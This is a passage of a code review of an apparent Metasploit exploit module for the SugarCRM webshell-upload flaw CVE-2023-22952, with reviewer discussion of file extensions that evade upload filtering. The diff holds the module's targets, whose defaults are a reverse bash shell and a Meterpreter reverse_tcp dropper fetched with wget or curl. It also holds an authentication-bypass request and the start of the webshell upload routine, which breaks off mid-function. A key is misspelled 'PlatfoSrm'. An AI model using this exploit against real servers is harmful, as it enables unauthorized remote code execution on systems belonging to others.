modules/exploits/linux/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -0,0 +1,247 @@
+          [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],
+          [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],
+          [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],
+          [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],
+          [ 'PACKETSTORM', '170346' ]
+        ],
+        'License' => MSF_LICENSE,
+        'PlatfoSrm' => 'unix',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X64 ],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-12-28',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('WEBSHELL', [
+          false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, .shtml, .inc, etc... Webshell name will be randomly generated if left unset.', nil
+        ])
+      ]
+    )
+  end
+
+  def authenticate
+    # generate PHP session-id
+    @phpsessid = "PHPSESSID=#{SecureRandom.uuid}"
+
+    # randomize user and password to obfuscate and make finger printing difficult.
+    user_name = Rex::Text.rand_name
+    user_password = Rex::Text.rand_text_alphanumeric(8..16)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'cookie' => @phpsessid.to_s,
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'module' => 'Users',
+        'action' => 'Authenticate',
+        'user_name' => user_name.to_s,
+        'user_password' => user_password.to_s
+      }
+    })
+    if res && res.code == 500 && !res.body.blank?
+      return true
+    else
+      return false
+    end
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    return nil
+  end
+
+  def upload_webshell
+    # randomize file name and extension if option WEBSHELL is not set
+    file_ext = ['phar', 'phtml']
```

Comment:
Maybe add more, like `inc`, `php7`, `php5`, …

Reply:
I tested with `inc`, `php7`, `php5`, but all of them are failing. Only `phar` and `phtml` seems to work.
I have added anyhow an additional `WEBSHELL` option where you can play with the extensions.

Reply:
May be a dumb idea but seeing if https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/file-upload/alt-extensions-php.txt helps at all is an idea to see if those checks are case sensitive or not and also strip out special characters.

Reply:
I played a bit with those suggestions, but it also depends on the PHP configuration. For now `phar` and `phtml` seems to work. The `WEBSHELL` option will give the user the flexibility to apply these suggestions if needed.
Interesting enough, `phar` is not even mentioned in the link 😉